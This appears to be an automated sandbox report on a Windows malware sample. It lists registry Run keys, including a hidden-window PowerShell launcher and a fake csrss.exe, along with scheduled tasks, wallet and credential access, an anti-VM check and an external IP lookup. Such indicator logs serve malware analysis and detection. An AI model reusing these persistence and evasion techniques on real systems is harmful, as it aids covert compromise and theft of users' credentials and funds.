Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\D561.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\F2C4.exe'\"" C:\Users\Admin\AppData\Local\Temp\F2C4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\KAudioConverter\is-T7FU9.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-IRTME.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-9PU0U.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-O0T2P.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-G4I98.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-2RNET.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-K3JDO.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-44EL2.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-9GL8I.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-AE2KE.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-7V03K.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-F1JTM.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-HMGJ2.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-PNEBC.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\KAudioConverter\is-DGRNM.tmp C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
